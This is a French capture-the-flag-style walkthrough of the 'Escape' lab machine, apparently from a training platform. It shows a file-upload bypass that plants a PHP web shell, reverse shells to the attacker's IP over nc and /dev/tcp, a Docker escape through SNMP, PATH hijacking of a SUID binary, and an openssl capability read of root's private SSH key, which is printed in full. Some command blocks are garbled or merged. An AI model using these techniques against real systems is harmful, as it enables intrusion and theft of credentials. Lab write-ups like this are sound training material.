# Escape `upload file` `suid` `openssl` `snmp` * Nom machine : Escape * Difficulté : Difficile * OS : Linux ## Enumération ### NMAP ``` Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-13 04:37 EDT Nmap scan report for 192.168.229.113 Host is up (0.035s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f0:85:61:65:d3:88:ad:49:6b:38:f4:ac:5b:90:4f:2d (RSA) | 256 05:80:90:92:ff:9e:d6:0e:2f:70:37:6d:86:76:db:05 (ECDSA) |_ 256 c3:57:35:b9:8a:a5:c0:f8:b1:b2:e9:73:09:ad:c7:9a (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Escape 8080/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: Escape |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache/2.4.38 (Debian) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-13 04:57 EDT Nmap scan report for 192.168.229.113 Host is up (0.033s latency). Not shown: 999 closed udp ports (port-unreach) PORT STATE SERVICE 161/udp open snmp ``` ### HTTP (80)

``` ┌──(kali㉿kali)-[~] └─$ dirsearch -u http://192.168.229.113/ _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET Threads: 25 | Wordlist size: 11460 Output File: /home/kali/reports/http_192.168.229.113/__24-08-13_04-37-31.txt Target: http://192.168.229.113/ [04:37:31] Starting: [04:37:33] 403 - 280B - /.ht_wsr.txt [04:37:33] 403 - 280B - /.htaccess.bak1 [04:37:33] 403 - 280B - /.htaccess.orig [04:37:33] 403 - 280B - /.htaccess.save [04:37:33] 403 - 280B - /.htaccess.sample [04:37:34] 403 - 280B - /.htaccess_orig [04:37:34] 403 - 280B - /.htaccess_extra [04:37:34] 403 - 280B - /.htaccess_sc [04:37:34] 403 - 280B - /.htaccessOLD [04:37:34] 403 - 280B - /.htaccessBAK [04:37:34] 403 - 280B - /.htaccessOLD2 [04:37:34] 403 - 280B - /.htm [04:37:34] 403 - 280B - /.html [04:37:34] 403 - 280B - /.htpasswd_test [04:37:34] 403 - 280B - /.htpasswds [04:37:34] 403 - 280B - /.httr-oauth [04:37:34] 403 - 280B - /.php [04:37:55] 403 - 280B - /server-status [04:37:55] 403 - 280B - /server-status/ Task Completed ``` ### HTTP (8080) Même image que précédemment ``` ┌──(kali㉿kali)-[~] └─$ dirsearch -u http://192.168.229.113:8080/ _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET Threads: 25 | Wordlist size: 11460 Output File: /home/kali/reports/http_192.168.229.113_8080/__24-08-13_04-38-31.txt Target: http://192.168.229.113:8080/ [04:38:31] Starting: [04:38:35] 403 - 282B - /.ht_wsr.txt [04:38:35] 403 - 282B - /.htaccess.bak1 [04:38:35] 403 - 282B - /.htaccess.sample [04:38:35] 403 - 282B - /.htaccess.orig [04:38:35] 403 - 282B - /.htaccess.save [04:38:35] 403 - 282B - /.htaccess_extra [04:38:35] 403 - 282B - /.htaccess_orig [04:38:35] 403 - 282B - /.htaccessBAK [04:38:35] 403 - 282B - /.htaccess_sc [04:38:35] 403 - 282B - /.htaccessOLD [04:38:35] 403 - 282B - /.htaccessOLD2 [04:38:35] 403 - 282B - /.htm [04:38:35] 403 - 282B - /.html [04:38:35] 403 - 282B - /.htpasswd_test [04:38:35] 403 - 282B - /.htpasswds [04:38:35] 403 - 282B - /.httr-oauth [04:38:45] 301 - 323B - /dev -> http://192.168.229.113:8080/dev/ [04:38:45] 200 - 508B - /dev/ [04:38:56] 403 - 282B - /server-status/ [04:38:56] 403 - 282B - /server-status ``` Dev ?

``` ┌──(kali㉿kali)-[~] └─$ dirsearch -u http://192.168.229.113:8080/dev/ _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET Threads: 25 | Wordlist size: 11460 Output File: /home/kali/reports/http_192.168.229.113_8080/_dev__24-08-13_04-41-34.txt Target: http://192.168.229.113:8080/ [04:41:34] Starting: dev/ [04:41:36] 200 - 8KB - /dev/.DS_Store [04:41:37] 403 - 282B - /dev/.ht_wsr.txt [04:41:37] 403 - 282B - /dev/.htaccess.bak1 [04:41:37] 403 - 282B - /dev/.htaccess.orig [04:41:37] 403 - 282B - /dev/.htaccess.sample [04:41:37] 403 - 282B - /dev/.htaccess.save [04:41:37] 403 - 282B - /dev/.htaccess_extra [04:41:37] 403 - 282B - /dev/.htaccess_orig [04:41:37] 403 - 282B - /dev/.htaccess_sc [04:41:37] 403 - 282B - /dev/.htaccessBAK [04:41:37] 403 - 282B - /dev/.htaccessOLD [04:41:37] 403 - 282B - /dev/.htaccessOLD2 [04:41:37] 403 - 282B - /dev/.htm [04:41:37] 403 - 282B - /dev/.html [04:41:37] 403 - 282B - /dev/.htpasswds [04:41:37] 403 - 282B - /dev/.htpasswd_test [04:41:37] 403 - 282B - /dev/.httr-oauth [04:41:46] 301 - 327B - /dev/css -> http://192.168.229.113:8080/dev/css/ [04:42:03] 403 - 282B - /dev/uploads/ [04:42:03] 301 - 331B - /dev/uploads -> http://192.168.229.113:8080/dev/uploads/ ``` Le chemin dev/uploads peut possiblement être intéressant. Nous allons tester d'upload un fichier malveillant sur le serveur. sur la page, on nous indique que seul les gifs sont acceptés. ## Accès initial Nous testons un fichier gif pour voir si il est bien uploadé... et non ! Nous avons testé plusieurs choses avec Burp Suite: * Intruder - tester un grand nombre d'extension --> sans résultat * Changer manuellement le magic number --> sans résultat * Jouer avec le Content-type --> sans résultat Jusqu'ici rien de surprenant, le site ne nous mène pas vers une fausse piste et il demande bien un fichier .gif Nous allons voir le code source de la page.

``` ``` Intéressant.... On supprime tout le contenu de notre gif sur Burp et on retente l'upload

"Uploaded" Nous allons tester le chemin /uploads

Bingo ! Maintenant nous allons essayer d'upload un shell. Si nous changeons uniquement l'extension, le fichier peut toujours être upload. On ajoute donc notre code php en plein milieu de la requête en renomons le fichier : shell.php

Nous touchons au but. La commande whoami nous indique bien www-data. Nous essayons which nc et n'avons pas de réponse, which bash indique /bin/bash, pas de réponse pour which python (problématique pour upgrade le shell) On génère un reverse shell avec en lançons un listeneur... Sans résultat. Nous allons tenter autrement, on va directement uploader php-pentest-monkey, de la même manière que le shell précédent. Et cela fonctionne ! ``` ┌──(kali㉿kali)-[~] └─$ nc -lnvp 80 listening on [any] 80 ... connect to [192.168.45.217] from (UNKNOWN) [192.168.229.113] 38812 Linux a7c367c2113d 4.15.0-124-generic #127-Ubuntu SMP Fri Nov 6 10:54:43 UTC 2020 x86_64 GNU/Linux 09:30:59 up 57 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell www-data@a7c367c2113d:/$ whoami whoami www-data ``` ## Elévation des privilèges Nous lançons un serveur python sur le port 8888 de notre machine kali et exécutons linpeas. ``` www-data@a7c367c2113d:/tmp$ curl -O http://192.168.45.217:8888/Tools/linpeas.sh &1|nc 192.168.45.217 80 >/tmp/f ``` ``` www-data@a7c367c2113d:/$ cd /tmp cd /tmp www-data@a7c367c2113d:/tmp$ curl -O http://192.168.45.217:8888/shtest curl -O http://192.168.45.217:8888/shtest % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 95 100 95 0 0 1557 0 --:--:-- --:--:-- --:--:-- 1557 ``` Nous allons le télécharger dans le dossier /tmp de notre machine cible. ``` ┌──(kali㉿kali)-[~] └─$ snmpwalk -v2c -c 53cur3M0NiT0riNg 192.168.229.113 NET-SNMP-EXTEND-MIB::nsExtendObjects {...} ``` ``` ┌──(kali㉿kali)-[~] └─$ nc -lnvp 22 listening on [any] 22 ... connect to [192.168.45.217] from (UNKNOWN) [192.168.229.113] 35110 bash: cannot set terminal process group (770): Inappropriate ioctl for device bash: no job control in this shell Debian-snmp@escape:/$ whoami whoami Debian-snmp ``` Nous avons bien échappé à Docker ! Maintenant nous devons devenir root ``` Debian-snmp@escape:/home/tom$ find / -perm -u=s 2>/dev/null find / -perm -u=s 2>/dev/null /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic /usr/lib/eject/dmcrypt-get-device /usr/lib/snapd/snap-confine /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/policykit-1/polkit-agent-helper-1 /usr/bin/newuidmap /usr/bin/passwd /usr/bin/chsh /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/newgidmap /usr/bin/pkexec /usr/bin/traceroute6.iputils /usr/bin/logconsole /usr/bin/sudo /usr/bin/at /usr/bin/chfn /bin/fusermount /bin/umount /bin/mount /bin/ping /bin/su ``` Un binaire est inhabituel : /usr/bin/logconsole Nous allons l'exécuter pour voir ce qu'il fait. ``` Debian-snmp@escape:/home/tom$ /usr/bin/logconsole /usr/bin/logconsole /$$ /$$ | $$ | $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$$ /$$$$$$ | $$ /$$$$$$ | $$ /$$__ $$ /$$__ $$ /$$_____/ /$$__ $$| $$__ $$ /$$_____/ /$$__ $$| $$ /$$__ $$ | $$| $$ \ $$| $$ \ $$| $$ | $$ \ $$| $$ \ $$| $$$$$$ | $$ \ $$| $$| $$$$$$$$ | $$| $$ | $$| $$ | $$| $$ | $$ | $$| $$ | $$ \____ $$| $$ | $$| $$| $$_____/ | $$| $$$$$$/| $$$$$$$| $$$$$$$| $$$$$$/| $$ | $$ /$$$$$$$/| $$$$$$/| $$| $$$$$$$ |__/ \______/ \____ $$ \_______/ \______/ |__/ |__/|_______/ \______/ |__/ \_______/ /$$ \ $$ | $$$$$$/ \______/ 1. About the Sytem 2. Current Process Status 3. List all the Users Logged in and out 4. Quick summary of User Logged in 5. IP Routing Table 6. CPU Information 7. To Exit 99. Generate the Report Enter the option ==> 1 Linux escape 4.15.0-124-generic #127-Ubuntu SMP Fri Nov 6 10:54:43 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux ``` Ok, il permet d'exécuter des commandes. Nous allons voir si on ne peut pas remplacer l'une de ses commandes par un shell. Si le binaire appele par un chemin absolu, nous ne pourrons pas le remplacer (sauf si chemin ouvert en écriture pour nous). Nous n'avons pas la commande string sur la cible, nous allons donc récupérer le binaire sur notre machine. Téléchargeons nc sur la cible, avec un serveur python puis ``` Debian-snmp@escape:/tmp$ nc 192.168.45.217 1234 < /usr/bin/logconsole ┌──(kali㉿kali)-[~] └─$ nc -lnvp 1234 > logconsole listening on [any] 1234 ... connect to [192.168.45.217] from (UNKNOWN) [192.168.229.113] 39356 ``` ``` ┌──(kali㉿kali)-[~] └─$ strings logconsole /lib64/ld-linux-x86-64.so.2 mgUa fopen __isoc99_scanf setreuid putchar stdin popen printf {...} [1;31m 1. About the Sytem 2. Current Process Status 3. List all the Users Logged in and out 4. Quick summary of User Logged in 5. IP Routing Table 6. CPU Information 7. To Exit 99. Generate the Report [01;33m Enter the option ==> /bin/uname -a /bin/ps aux /usr/bin/last /usr/bin/w /sbin/ip route | column -t lscpu {...} ``` La plupart des commandes utilisent leur chemin absolu. Ce n'est pas le cas de lscpu. ``` ┌──(kali㉿kali)-[~] └─$ cat lscpu #!/bin/bash /bin/bash -i >& /dev/tcp/192.168.45.217/21 0>&1 ``` ``` Debian-snmp@escape:/$ cd /tmp cd /tmp Debian-snmp@escape:/tmp$ curl -O http://192.168.45.217:8888/lscpu curl -O http://192.168.45.217:8888/lscpu % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- -- 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --100 61 100 61 0 0 953 0 --:--:-- --:--:-- --:--:-- 953 Debian-snmp@escape:/tmp$ chmod +x lscpu chmod +x lscpu Debian-snmp@escape:/tmp$ export PATH=/tmp:$PATH export PATH=/tmp:$PATH Debian-snmp@escape:/tmp$ /usr/bin/logconsole ``` Choisir le 6 ``` ┌──(kali㉿kali)-[~] └─$ nc -lnvp 21 listening on [any] 21 ... connect to [192.168.45.217] from (UNKNOWN) [192.168.229.113] 35918 bash: cannot set terminal process group (770): Inappropriate ioctl for device bash: no job control in this shell tom@escape:/tmp$ cd ``` On relance linpeas... `/opt/cert/openssl =ep is writable` ``` tom@escape:/opt/cert$ ls -al ls -al total 724 drwxr-xr-x 2 root root 4096 Dec 9 2020 . drwxr-xr-x 4 root root 4096 Dec 9 2020 .. -rwx------ 1 root root 1245 Dec 9 2020 certificate.pem -rwx------ 1 root root 1704 Dec 9 2020 key.pem -rwxr-x--- 1 tom tom 723944 Dec 9 2020 openssl ``` ``` tom@escape:/opt/cert$ /opt/cert/openssl enc -in "/root/.ssh/id_rsa" /opt/cert/openssl enc -in "/root/.ssh/id_rsa" -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAwwvvVIS3//uz+Mpg24l51p48akveZgI8bDQDun7y9BKhRDWg GzIzCpt7NcVWVN2llo9KOL3c3EZZxGOaTbzpINZxSWj3/WWBYhNqmKQRsgJzbPv2 kOe/XwWw8Bt9TuFAd7GUbylpbyHOES7siXFUd/XP503ehllp/JFp0G+2YPkYPGbi 0EISJcNFPNnRlXIQs3Fte0QqFiPE9nPycSMqvGz8a9OtaPGlmOZ3wP56jxxIBT0I SrkfuLGw7b9VN05jJ33EMtDGRyyDLljFXv7t5OktkC0omumXyWG2KRRe3Avn4RMI V+IE0rS8N2pIymRF3u8U/9YMX/Ps2EPvNQFkTQIDAQABAoIBAQCXXa/Ce6z/76pf rU81kJ8JO4vPQkm6CIozvroWBWcumzaj5Kn38SFDXh5kQF0bR1e2XEVRe6bnG4GW s2WQZsbVQRZxzhCGiju6jS7wfoNtDhHdxjw3gGI3sAb8j5jTmmOZgCqdihnUsPtm wm+2ykivQAi0jO3gfYuPApqHs+ppngt2KeMUZesIz4BWuFAnS0ePK/tpTHpZ4KRj D/sb1kdseaCmPfOD6oTMGNtTiakkDUzObN3Pw19v5wkHfawTbmsSeiPmW1nC5xh/ OI7K+wbVUCj3Dys3xqKoCMK27y+pYHzzoiz7ol+OitIth6ucDe6NC6cFbVPmW2o0 fk+U8VbRAoGBAOcfAlARjYV6qc2ukF9NYlVy/WYoP3zFzfb7uYu9I1OpLID+PYeN ixpqKKgRoxM+ndsWWnyHjw5Kyq2+DHBE67OOpbd69y+fUYOhFiSH2TnQsB1LPtkH ZT0pZyaBavQLZFZChpOeQ96qfEw5xwA65zENCSFoGoILHS92akVmWQnTAoGBANgK 0qNNsJYETJSob/KdnMYXbE3tPjNkdCzKXXklgZXeUKn6U//0vRhJWZGHv8RDWrlh 1wc9Op88Dx003Ay+3vVqjOs7ur46KankMTj+PN5B5CX1CioXtJ9T6qRF+8+46oq7 pXBTqfi7Gp2m+RuQJS9Ct2bu6OUYgGdUzQ8p/+VfAoGAOhCnUxhl1sAPgxY1PUxC xTcDhLPd52oGqeNqJTpacr1Q6gN1z+V2qic7maX8s2wK2q0OBLVF8pBFxUq280nN caoH5kXlbjh3kTtaRck/gO/2HxX1by8Vdz08pgbjqPZnuegyyUl8wadRXREy9tLV nJQq1BLEfiFurqrwXgktm3MCgYEAroDPcyilogcG9Gy5P/cfUsJIsQkYXNqfHC65 IcmxyiQwc5vHjc9ZjexxdKN5ukXNWkA1N5u1ZjlU2/p+Y60o2oKeIMO2K0E/tgKj 36077Sq75gzvkOBk/O0Dcn000KxEhprbHsf1WvuGnCDqxeDAqFPzYClJ5QLNdKmC mOUL1XECgYB1wX6H2xWJ+GvC1qKVs4WOYjfCvVZTh+9i8CpA1i4xmmmXXnc+jy/O Bl7VLsdfeQ3L/NOBTng09PO2lwSWdghCMeS25rMm6/xZTOduauGVTMKx4DT7FvX6 NLU86rcVJCcqL0LdcJ7/2tmwsyuqhCLQ0fl37ZCS93LTXqGUzXfViw== -----END RSA PRIVATE KEY----- ``` ``` ┌──(kali㉿kali)-[~] └─$ nano id_rsa ┌──(kali㉿kali)-[~] └─$ chmod 600 id_rsa ┌──(kali㉿kali)-[~] └─$ ssh root@192.168.229.113 -i id_rsa The authenticity of host '192.168.229.113 (192.168.229.113)' can't be established. ED25519 key fingerprint is SHA256:BFNHiG0TgvKeKOogN97RoTQRycbNoZgxixjThnW0398. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.229.113' (ED25519) to the list of known hosts. Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-124-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Tue Aug 13 08:24:08 EDT 2024 System load: 0.0 Processes: 175 Usage of /: 26.9% of 15.68GB Users logged in: 0 Memory usage: 25% IP address for docker0: 172.17.0.1 Swap usage: 0% IP address for ens192: 192.168.229.113 * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 14 packages can be updated. 10 updates are security updates. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@escape:~# ``` Nous sommes root !